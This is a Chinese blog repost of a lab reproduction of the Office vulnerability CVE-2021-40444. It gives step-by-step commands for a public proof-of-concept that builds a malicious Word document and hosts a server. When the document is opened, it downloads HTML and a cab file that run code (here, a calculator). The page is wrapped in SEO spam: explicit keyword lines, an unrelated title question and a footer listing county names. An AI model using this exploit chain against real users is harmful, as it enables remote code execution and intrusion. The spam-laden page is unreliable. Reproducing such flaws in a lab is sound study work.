欧美精品123_精品露脸国产偷人在视频_日韩美女免费线视频_成人av三级

2021年的word文檔還有漏洞,Office 1day CVE-2021-40444復現(2021年的微博之夜的king和queen是誰)

本文的標題是《2021年的word文檔還有漏洞,Office 1day CVE-2021-40444復現》來源于:由作者:陳鵬羽采編而成,主要講述了項目地址在https://github.com/lo

項目地址在https://github.com/lockedbyte/CVE-2021-40444。先下載到kali里。

由于此項目必須使用lcab,所以我們先在kail里安裝一下。

wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make
sudo make install
which lcab
# 查看幫助信息
lcab –help


021年的word文檔還有漏洞,Office


021年的word文檔還有漏洞,Office


021年的word文檔還有漏洞,Office


021年的word文檔還有漏洞,Office

進入下載后的CVE-2021-40444目錄里,執行:

python3 exploit.py generate test/calc.dll http://<SRV IP>:3333


021年的word文檔還有漏洞,Office

看見“You can execute now the server and then send document.docx to target” 說明就可以了。

然后用python開一個http服務,端口用剛剛設置的3333 或者自己設置的端口號。

sudo python3 exploit.py host 3333


021年的word文檔還有漏洞,Office

把CVE-2021-40444目錄里的子目錄out下的document.docx文件copy到虛擬機中執行。

word打開后,可以看見這里在下載我們kali上的html文件。


021年的word文檔還有漏洞,Office


html又會下載calc.cab 文件執行其中的命令,最后彈出計算器。


021年的word文檔還有漏洞,Office

服務端顯示的結果:


021年的word文檔還有漏洞,Office

021年的word文檔還有漏洞,Office
本文原作者為陳鵬羽,轉載請注明:出處!如該文有不妥之處,請聯系站長刪除,謝謝合作~

原創文章,作者:陳鵬羽,如若轉載,請注明出處:http://www.uuuxu.com/20220512315602.html

主站蜘蛛池模板: 夏邑县| 察隅县| 内丘县| 突泉县| 左权县| 天等县| 剑川县| 康定县| 抚顺市| 兴业县| 清流县| 乐至县| 石楼县| 安新县| 五常市| 资中县| 九台市| 鸡东县| 金川县| 耒阳市| 双峰县| 黑龙江省| 阿城市| 清涧县| 汶上县| 灵宝市| 芒康县| 曲周县| 九寨沟县| 沙湾县| 民乐县| 镇远县| 鄄城县| 固镇县| 荆州市| 滁州市| 余姚市| 庄河市| 海阳市| 嫩江县| 霍林郭勒市|